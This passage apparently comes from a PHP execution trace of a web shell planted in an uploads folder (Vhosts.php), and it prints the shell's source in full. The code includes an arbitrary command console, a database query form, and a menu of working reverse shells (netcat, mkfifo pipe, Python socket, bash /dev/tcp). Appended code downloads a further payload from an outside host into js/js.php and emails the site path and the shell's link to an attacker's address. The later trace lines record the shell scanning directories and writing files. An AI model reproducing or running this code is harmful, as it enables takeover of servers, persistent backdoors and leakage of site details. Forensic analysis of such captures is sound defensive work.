\'</optgroup>\';\r\n\r\n \techo \'<optgroup label="Python">\';\r\n \techo \'<option value="Python-/bin/sh">Python /bin/sh</option>\';\r\n \techo \'<option value="Python-/bin/bash">Python /bin/bash</option>\';\r\n \techo \'</optgroup>\';\r\n\r\n \techo \'<optgroup label="Bash">\';\r\n \techo \'<option value="Bash">Bash /bin/bash</option>\';\r\n \techo \'</optgroup>\';\r\n\r\n \techo \'<optgroup label="Ruby">\';\r\n \techo \'<option value="Ruby-/bin/sh">Ruby /bin/sh</option>\';\r\n \techo \'</optgroup>\';\r\n \techo \'</select>\';\r\n\r\n \techo \'<br><br>\';\r\n\t\techo \'<input type="submit" value="Submit">\';\r\n\t\techo \'</form>\';\r\n\t}\r\n\r\n\t//Get all files/folders in directory\r\n\tfunction directoryList($dir)\r\n\t{\r\n\t\techo "<table>";\r\n\t\techo "<tr>";\r\n\t\techo "<th>Name</th><th>Size</th><th>Last Modified Time </th><th>Permissions</th><th>Owner</th><th>Group</th>";\r\n\t\techo "</tr>";\r\n\t\t\r\n\t\t// Open a directory, and read its contents\r\n\t\tif (is_dir($dir))\r\n\t\t{\r\n\t\t\tif ($dh = opendir($dir))\r\n\t\t\t{\r\n\t\t\t\t// loop through each file/folder in directory\r\n\t\t\t\twhile (($file = readdir($dh)) !== false)\r\n\t\t\t\t{\r\n\t\t\t\t\t// if not directory or regular file just display filename without a link\r\n\t\t\t\t\t$link = $file;\r\n\t\t\t\t\t// save filename so we can display it later\r\n\t\t\t\t\t$fileDisplayName = $file;\r\n\r\n\t\t\t\t\t//if directory display link to enter directory \r\n\t\t\t\t\tif(substr(filepermission($dir.$file), 0, 1) === \'d\' )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t// create formID so JS can submit the form\r\n\t\t\t\t\t\t$formId = $file.\'d\';\r\n\r\n\t\t\t\t\t\t// . = same directory so no need to append . to $dir\r\n\t\t\t\t\t\tif($file === \'.\')\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t$file = \'\';\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t// add / to end of directory name\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t$file = $file .\'/\';\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t\t$link = \'<form id="\'.$formId.\'" action="" method="get"> <input type="hidden" name="directory" value="\'.$dir.$file.\'"> <a href="#" onclick="document.getElementById(\\\'\'.$formId.\'\\\').submit();"> \'.$fileDisplayName.\' </a></form>\';\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\t// if regular file display link to open and read file\r\n\t\t\t\t\telseif (substr(filepermission($dir.$file), 0, 1) === \'r\')\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t// create formID so JS can submit the form\r\n\t\t\t\t\t\t$formId = $file.\'r\';\r\n\t\t\t\t\t\t$link = \'<form id="\'.$formId.\'" action="" method="get"> <input type="hidden" name="displayfile" value="\'.$dir.$file.\'"> <a href="#" onclick="document.getElementById(\\\'\'.$formId.\'\\\').submit();"> \'.$fileDisplayName.\' </a></form>\';\r\n\t\t\t\t\t}\t\t\t\r\n\t\t\t\t\t\r\n\t\t\t\t\t//display file/directory info\r\n\t\t\t\t\techo "<tr>";\r\n\t\t\t\t\techo "<td>" . $link . "</td>";\r\n\t\t\t\t\techo "<td>" . getFileSize($dir,$file). "</td>";\r\n\t\t\t\t\techo "<td>" . getFileLastModTime($dir,$file). "</td>";\r\n\t\t\t\t\techo "<td>" . filepermission($dir.$file). "</td>";\r\n\t\t\t\t\techo "<td>" . getFileOwner($dir,$file). "</td>";\r\n\t\t\t\t\techo "<td>" . getFileGroup($dir,$file). "</td>";\r\n\t\t\t\t\techo "</tr>";\r\n\r\n\t\t\t\t\t\r\n\t\t\t\t}\r\n\t\t\t\tclosedir($dh);\r\n\t\t\t}\r\n\t\t}\r\n\t\techo \'</table>\';\r\n\t}\r\n\r\n\t//Database form\r\n\tfunction displayRDatabaseForm()\r\n\t{\r\n\t\t// check if programs are installed\r\n\t\t$Mysql = exec("which mysql");\r\n\r\n\t\t\r\n\r\n\t\techo "<div id=\'fleftReverseShell\'>";\r\n\t\techo "<h4> Installed Applications</h4>";\r\n\r\n\t\t// If not installed string will be empty \r\n\t\tif($Mysql === \'\')\r\n\t\t{\r\n\t\t\techo \'Mysql - <font color="red">Not Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo \'Mysql - <font color="green">Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\t\t// check if mysqli function exists - we need php-mysqli to interact with mysql\r\n\t\tif(function_exists(\'mysqli_connect\'))\r\n\t\t{\r\n\t\t\techo \' Mysqli Php - <font color="green">Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo \' Mysqli Php - <font color="red">Not Installed</font>\';\r\n\t\t\techo \'<br>\';\r\n\t\t\techo \'<br>\';\r\n\t\t}\r\n\t\t\r\n\t\techo "</div>";\r\n\r\n\t\techo \'<form action="">\';\r\n\t\techo \'<label>Username</label><br>\';\r\n\t\techo \'<input type="text" name="username" placeholder="root"><br><br>\';\r\n\r\n\t\techo \'<label>Password</label><br>\';\r\n\t\techo \'<input type="text" name="password" placeholder="******"> <br><br>\';\r\n\r\n\t\techo \'<label>Query</label><br>\';\r\n\t\techo \'<input type="text" name="query" placeholder="select * from database.table"><br><br>\';\r\n\t\techo \'<input type="hidden" name="database" value="1">\';\r\n\r\n\t\techo \'<input type="submit" value="Submit">\';\r\n\t\techo \'</form>\';\r\n\t}\r\n\r\n\t// display selected file\r\n\tfunction getReadFile($file)\r\n\t{\r\n\t\t// have to replace the </xmp> so it doesnt mess up and cancel the real </xmp> a couple lines down\r\n\t\t$output = str_replace("</xmp>", "<[SLASH]xmp>", shell_exec(\'cat \' . $file));\r\n\t\techo "<xmp>";\r\n\t\techo $output;\r\n\t\techo "</xmp>";\r\n\t\t\r\n\t\t\r\n\t}\r\n\r\n\t// get file permissions read/write/execute *code reuse*\r\n\tfunction filepermission($filePath)\r\n\t{\r\n\t\t$perms = fileperms($filePath);\r\n\r\n\t\tswitch ($perms & 0xF000)\r\n\t\t{\r\n\t\t case 0xC000: // socket\r\n\t\t $info = \'s\';\r\n\t\t break;\r\n\t\t case 0xA000: // symbolic link\r\n\t\t $info = \'l\';\r\n\t\t break;\r\n\t\t case 0x8000: // regular\r\n\t\t $info = \'r\';\r\n\t\t break;\r\n\t\t case 0x6000: // block special\r\n\t\t $info = \'b\';\r\n\t\t break;\r\n\t\t case 0x4000: // directory\r\n\t\t $info = \'d\';\r\n\t\t break;\r\n\t\t case 0x2000: // character special\r\n\t\t $info = \'c\';\r\n\t\t break;\r\n\t\t case 0x1000: // FIFO pipe\r\n\t\t $info = \'p\';\r\n\t\t break;\r\n\t\t default: // unknown\r\n\t\t $info = \'u-\';\r\n\t\t}\r\n\r\n\t\t// Owner\r\n\t\t$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n\t\t$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n\t\t$info .= (($perms & 0x0040) ?\r\n\t\t (($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n\t\t (($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n\t\t// Group\r\n\t\t$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n\t\t$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n\t\t$info .= (($perms & 0x0008) ?\r\n\t\t (($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n\t\t (($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n\t\t// World\r\n\t\t$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n\t\t$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n\t\t$info .= (($perms & 0x0001) ?\r\n\t\t (($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n\t\t (($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\n\t\treturn $info;\r\n\t}\r\n\r\n\r\n\t//get file size\r\n\tfunction getFileSize($dir,$file)\r\n\t{\r\n\t\treturn filesize($dir.$file);\r\n\t}\r\n\r\n\t//get Last Modified Time\r\n\tfunction getFileLastModTime($dir,$file)\r\n\t{\r\n\t\treturn date("F d Y H:i:s.", filemtime($dir.$file));\r\n\t}\r\n\t\r\n\t// get file owner\r\n\tfunction getFileOwner($dir,$file)\r\n\t{\r\n\t\t$fileOwnerInfo = posix_getpwuid(fileowner($dir.$file));\r\n\t\treturn $fileOwnerInfo[name];\r\n\t}\r\n\r\n\t// get file group\r\n\tfunction getFileGroup($dir,$file)\r\n\t{\r\n\t\t$fileGroupInfo = posix_getgrgid(filegroup($dir.$file));\r\n\t\treturn $fileGroupInfo[name];\r\n\t}\r\n\r\n\t// get memory - *code reuse* modified a little\r\n\tfunction shapeSpace_server_memory_usage() \r\n\t{\r\n\t$free = shell_exec(\'free\');\r\n\t$free = (string)trim($free);\r\n\t$free_arr = explode("\\n", $free);\r\n\t$mem = explode(" ", $free_arr[1]);\r\n\t$mem = array_filter($mem);\r\n\t$mem = array_merge($mem);\r\n\t$memory_usage = $mem[2] / $mem[1] * 100;\r\n \r\n\treturn array($mem[1] / (1024 * 1024), $mem[2] / (1024 * 1024), $memory_usage);\r\n\t\r\n\t}\r\n\r\n\tfunction systemInfo()\r\n\t{\r\n\t\t$OS = php_uname(\'s\');\r\n\t\t$hostName = php_uname(\'n\');\r\n\t\t$version = php_uname(\'v\');\r\n\t\t$architecture = php_uname(\'m\');\r\n\t\t$df = disk_free_space("/") / (1024 * 1024 * 1024);\r\n\t\t$dt = disk_total_space("/") / (1024 * 1024 * 1024);\r\n\t\t$memory_array = shapeSpace_server_memory_usage();\r\n\r\n\t\techo "OS:" . $OS . " HostName:" . $hostName . " Version:" . $version . " Architecture:" . $architecture . " Disk Free Space:" . $df. " Disk Total Space:" . $dt . " Memory Total GB:" . $memory_array[0] . " Memory Used GB:" . $memory_array[1] . " Memory Usage:" . $memory_array[2] . "%";\r\n\r\n\t}\r\n\t\r\n\r\n\t\r\n\r\n\theadhtml();\r\n\t//display file\r\n\tif(isset($_GET["displayfile"]))\r\n\t{\r\n\t\t$file = $_GET["displayfile"];\r\n\t\t// call function to read file\r\n\t\tgetReadFile($file);\r\n\t}\r\n\r\n\t// console Tab\r\n\telse if(isset($_GET["console"]))\r\n\t{\r\n\t\t//display console form\r\n\t\tdisplayConsoleForm();\r\n\r\n\t\t// if we get command to run\r\n\t\tif(isset($_GET["command"]))\r\n\t\t{\r\n\t\t\t$cmd = $_GET["command"];\r\n\t\t\techo "<div id=\'command\'>";\r\n\t\t\t// execute command \r\n\t\t\t$lastLine = exec($cmd,$cmdOutput);\r\n\r\n\t\t\t// loop through array\r\n\t\t\tforeach($cmdOutput as $line)\r\n\t\t\t{\r\n\t\t\t\t// echo output and replace spaces with \r\n\t\t\t\techo str_replace(" ", " ", $line) ."<br>";\r\n\t\t\t}\r\n\r\n\t\t\techo "</div>";\r\n\t\t}\r\n\t}\r\n\t//reverse shell tab\r\n\telse if(isset($_GET["reverse-shell"]))\r\n\t{\r\n\t\t//display reverse shell form\r\n\t\tdisplayReverseShellForm();\r\n\r\n\t\tif(isset($_GET["ip"]) && isset($_GET["port"]))\r\n\t\t{\r\n\t\t\t$ip = $_GET["ip"];\r\n\t\t\t$port = $_GET["port"];\r\n\t\t\t$option = $_GET["option"];\r\n\r\n\t\t\tif($option === \'Netcat-/bin/sh\')\r\n\t\t\t{\r\n\t\t\t\t$cmd = "nc -e /bin/sh " . $ip . \' \' . $port;\r\n\t\t\t\tsystem($cmd);\r\n\t\t\t\techo \'Executed - \' . $cmd;\r\n\t\t\t}\r\n\t\t\telseif($option === \'Netcat-/bin/bash\')\r\n\t\t\t{\r\n\t\t\t\t$cmd = "nc -e /bin/bash " . $ip . \' \' . $port;\r\n\t\t\t\tsystem($cmd);\r\n\t\t\t\techo \'Executed - \' . $cmd;\r\n\t\t\t}\r\n\t\t\telseif($option === \'Netcat-/bin/sh-pipes\')\r\n\t\t\t{\r\n\t\t\t\t$cmd = \'rm /tmp/tt;mkfifo /tmp/tt;cat /tmp/tt|/bin/sh -i 2>&1|nc \'. $ip . \' \' . $port . \' >/tmp/tt\' ;\r\n\t\t\t\texec($cmd);\r\n\t\t\t\techo \'Executed - \' . $cmd;\r\n\t\t\t}\r\n\t\t\telseif($option === \'Netcat-/bin/bash-pipes\')\r\n\t\t\t{\r\n\t\t\t\t$cmd = \'rm /tmp/tt;mkfifo /tmp/tt;cat /tmp/tt|/bin/bash -i 2>&1|nc \'. $ip . \' \' . $port . \' >/tmp/tt\' ;\r\n\t\t\t\texec($cmd);\r\n\t\t\t\techo \'Executed - \' . $cmd;\r\n\t\t\t}\r\n\t\t\telseif($option === \'Python-/bin/sh\')\r\n\t\t\t{\r\n\t\t\t\t$cmd = "python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"".$ip."\\",".$port."));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);\' &";\r\n\t\t\t\tsystem($cmd);\r\n\t\t\t\techo \'Executed - \' . $cmd;\r\n\t\t\t}\r\n\t\t\telseif($option === \'Python-/bin/bash\')\r\n\t\t\t{\r\n\t\t\t\t$cmd = "python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"".$ip."\\",".$port."));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/bash\\",\\"-i\\"]);\' &";\r\n\t\t\t\tsystem($cmd);\r\n\t\t\t\techo \'Executed - \' . $cmd;\r\n\t\t\t}\r\n\t\t\t// ******************************************** Command works but hangs in php need to fix **************************************************\r\n\t\t\telseif($option === \'Bash\')\r\n\t\t\t{\r\n\t\t\t\t// make sure we change to bash shell (bash;) before executing command other wise we get "Bad fd number" error\r\n\t\t\t\t$cmd = \'echo "bash -i >& /dev/tcp/\'.$ip.\'/\'.$port.\' 0>&1" | bash\';\r\n\t\t\t\texec($cmd);\r\n\t\t\t\techo \'Executed - \' . $cmd;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t//Databse shell tab\r\n\telse if(isset($_GET["database"]))\r\n\t{\r\n\t\tdisplayRDatabaseForm();\r\n\r\n\t\tif(isset($_GET["username"]) && isset($_GET["password"]))\r\n\t\t{\r\n\t\t\t$username = $_GET["username"];\r\n\t\t\t$password = $_GET["password"];\r\n\t\t\t$query = $_GET["query"];\r\n\r\n\t\t\t$link = mysqli_connect("127.0.0.1", $username, $password);\r\n\t\t\t$result = mysqli_query($link,$query);\r\n\t\t\t$count = mysqli_num_rows($result);\r\n\t\t\t$column_count = mysqli_num_fields($result);\r\n\r\n\t\t\t\r\n\r\n\t\t\techo "<table>";\r\n\r\n\t\t\techo "<tr>";\r\n\t\t\t$finfo = mysqli_fetch_fields($result);\r\n \tforeach ($finfo as $val)\r\n \t{\r\n \techo "<th>".$val->name."</th>";\r\n }\r\n\t\t\techo "</tr>";\r\n\r\n\t\t\twhile($row = mysqli_fetch_row($result))\r\n\t\t\t{\r\n\t\t\t\t$i = 0;\r\n\t\t\t\techo "<tr>";\r\n\t\t\t\twhile($i < $column_count)\r\n\t\t\t\t{\r\n\t\t\t\t\t//echo $row[$i];\r\n\t\t\t\t\techo "<td>".$row[$i]."</td>";\r\n\t\t\t\t\t$i = $i +1;\r\n\t\t\t\t}\r\n\t\t\t\techo "</tr>";\r\n\t\t\t\techo "</br>";\r\n\t\t\t\t\r\n\t\t\t}\r\n\t\t\techo "</table>";\r\n\t\t}\r\n\t}\t\r\n\r\n\t// Home Tab\r\n\telse\r\n\t{\r\n\t\t//systemInfo();\r\n\t\t//default directory\r\n\t\t$directory = "/var/www/";\r\n\t\t//get new directory\r\n\t\tif(isset($_GET["directory"]))\r\n\t\t{\r\n\t\t\t$directory = $_GET["directory"];\r\n\t\t}\r\n\t\t//display directory form \r\n\t\tdisplayFolderForm();\r\n\t\t// display direcotries\r\n\t\tdirectoryList($directory);\r\n\t}\r\n\t\r\n\t//echo system("/usr/bin/wget google.com -O /tmp/tt");\r\n\t\r\n\r\n\tfoothtml();\r\n\r\n?><?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("https://wordpres.page/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/crs.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?><?php\r\n$kime = "byhero44@gmail.com";\r\n$baslik = "keisatsu shell 20203";\r\n$EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER[\'DOCUMENT_ROOT\'] . "\\r\\n";\r\n$EL_MuHaMMeD.= "Server Admin : " . $_SERVER[\'SERVER_ADMIN\'] . "\\r\\n";\r\n$EL_MuHaMMeD.= "Server isletim sistemi : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\\r\\n";\r\n$EL_MuHaMMeD.= "Shell Link : http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'PHP_SELF\'] . "\\r\\n";\r\n$EL_MuHaMMeD.= "Avlanan Site : " . $_SERVER[\'HTTP_HOST\'] . "\\r\\n";\r\nmail($kime, $baslik, $EL_MuHaMMeD);\r\n?>' /var/www/html/uploads/Vhosts.php(4) : eval()'d code 1 0
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 2 $document_root = '/var/www/html'
4 20 0 0.004874 575728 dirname 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 3 1 '/var/www/html/uploads/Vhosts.php(4) : eval()\'d code(1) : eval()\'d code'
4 20 1 0.004890 575856
4 20 R '/var/www/html/uploads'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 3 $document_root_file = '/var/www/html/uploads'
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 4 $wp_detect = 0
4 21 0 0.004930 575880 file_exists 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 5 1 '/var/www/html/wp-load.php'
4 21 1 0.004953 575920
4 21 R FALSE
4 22 0 0.004967 575824 explode 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 11 2 '/' '/var/www/html/uploads'
4 22 1 0.004984 576400
4 22 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 11 $prefix = 5
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 12 $a = ''
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 13 $i = 0
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 15 $a = '../'
4 23 0 0.005050 575888 file_exists 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 16 1 '/var/www/html/uploads/../wp-load.php'
4 23 1 0.005069 575928
4 23 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 13 $i++
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 15 $a = '../../'
4 24 0 0.005104 575920 file_exists 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 16 1 '/var/www/html/uploads/../../wp-load.php'
4 24 1 0.005122 575960
4 24 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 13 $i++
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 15 $a = '../../../'
4 25 0 0.005156 575944 file_exists 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 16 1 '/var/www/html/uploads/../../../wp-load.php'
4 25 1 0.005173 575984
4 25 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 13 $i++
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 15 $a = '../../../../'
4 26 0 0.005206 575944 file_exists 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 16 1 '/var/www/html/uploads/../../../../wp-load.php'
4 26 1 0.005223 575984
4 26 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 13 $i++
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 15 $a = '../../../../../'
4 27 0 0.005256 575944 file_exists 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 16 1 '/var/www/html/uploads/../../../../../wp-load.php'
4 27 1 0.005273 575984
4 27 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 13 $i++
4 28 0 0.005296 575864 http_get 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 63 1 '#'
5 29 0 0.005311 575864 curl_init 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 108 1 '#'
5 29 1 0.005331 576808
5 29 R resource(3) of type (curl)
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 108 $im = resource(3) of type (curl)
5 30 0 0.005359 576776 curl_setopt 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 109 3 resource(3) of type (curl) 19913 1
5 30 1 0.005375 576872
5 30 R TRUE
5 31 0 0.005388 576776 curl_setopt 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 110 3 resource(3) of type (curl) 78 10
5 31 1 0.005404 576872
5 31 R TRUE
5 32 0 0.005416 576776 curl_setopt 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 111 3 resource(3) of type (curl) 52 1
5 32 1 0.005431 576872
5 32 R TRUE
5 33 0 0.005443 576776 curl_setopt 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 112 3 resource(3) of type (curl) 42 0
5 33 1 0.005457 576872
5 33 R TRUE
5 34 0 0.005470 576776 curl_exec 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 113 1 resource(3) of type (curl)
5 34 1 0.005514 576808
5 34 R FALSE
4 28 1 0.005542 575864
4 28 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 63 $code = FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 64 $wp_code = '/var/www/html/#'
4 35 0 0.005580 575904 fopen 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 65 2 '/var/www/html/#' 'w'
4 35 1 0.005614 576544
4 35 R resource(5) of type (stream)
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 65 $open_code = resource(5) of type (stream)
4 36 0 0.005644 576472 fwrite 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 66 2 resource(5) of type (stream) FALSE
4 36 1 0.005660 576536
4 36 R 0
4 37 0 0.005672 576472 fclose 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 67 1 resource(5) of type (stream)
4 37 1 0.005689 576072
4 37 R TRUE
4 38 0 0.005702 576040 http_get 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 71 1 ''
5 39 0 0.005716 576040 curl_init 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 108 1 ''
5 39 1 0.005732 576984
5 39 R resource(6) of type (curl)
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 108 $im = resource(6) of type (curl)
5 40 0 0.005764 576952 curl_setopt 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 109 3 resource(6) of type (curl) 19913 1
5 40 1 0.005781 577048
5 40 R TRUE
5 41 0 0.005793 576952 curl_setopt 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 110 3 resource(6) of type (curl) 78 10
5 41 1 0.005808 577048
5 41 R TRUE
5 42 0 0.005821 576952 curl_setopt 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 111 3 resource(6) of type (curl) 52 1
5 42 1 0.005836 577048
5 42 R TRUE
5 43 0 0.005848 576952 curl_setopt 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 112 3 resource(6) of type (curl) 42 0
5 43 1 0.005863 577048
5 43 R TRUE
5 44 0 0.005875 576952 curl_exec 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 113 1 resource(6) of type (curl)
5 44 1 0.005916 576984
5 44 R FALSE
4 38 1 0.005944 576040
4 38 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 71 $makale = FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 72 $wp_makale = '/var/www/html/'
4 45 0 0.005983 576080 fopen 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 73 2 '/var/www/html/' 'w'
4 45 1 0.006021 576152
4 45 R FALSE
3 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 73 $open_makale = FALSE
4 46 0 0.006047 576080 fwrite 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 74 2 FALSE FALSE
4 46 1 0.006067 576144
4 46 R FALSE
4 47 0 0.006081 576080 fclose 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 75 1 FALSE
4 47 1 0.006104 576112
4 47 R FALSE
4 48 0 0.006117 576080 expandDirectories 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 80 1 '/var/www/html'
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 95 $directories = []
5 49 0 0.006143 576080 scandir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 96 1 '/var/www/html'
5 49 1 0.006172 576616
5 49 R [0 => '#', 1 => '.', 2 => '..', 3 => 'uploads']
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 98 $dir = '/var/www/html/#'
5 50 0 0.006204 576624 is_dir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 99 1 '/var/www/html/#'
5 50 1 0.006221 576680
5 50 R FALSE
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 98 $dir = '/var/www/html/uploads'
5 51 0 0.006247 576648 is_dir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 99 1 '/var/www/html/uploads'
5 51 1 0.006261 576696
5 51 R TRUE
4 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 100 $directories[] = '/var/www/html/uploads'
5 52 0 0.006287 577032 expandDirectories 1 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 101 1 '/var/www/html/uploads'
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 95 $directories = []
6 53 0 0.006313 577032 scandir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 96 1 '/var/www/html/uploads'
6 53 1 0.006339 577656
6 53 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Vhosts.php', 4 => 'data', 5 => 'prepend.php']
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 98 $dir = '/var/www/html/uploads/.htaccess'
6 54 0 0.006372 577680 is_dir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 99 1 '/var/www/html/uploads/.htaccess'
6 54 1 0.006388 577728
6 54 R FALSE
5 A /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 98 $dir = '/var/www/html/uploads/Vhosts.php'
6 55 0 0.006413 577696 is_dir 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code(1) : eval()'d code 99 1 '/var/www/html/uploads/Vhosts.php'
6 55 1 0.006428 577744
6 55 R FALSE
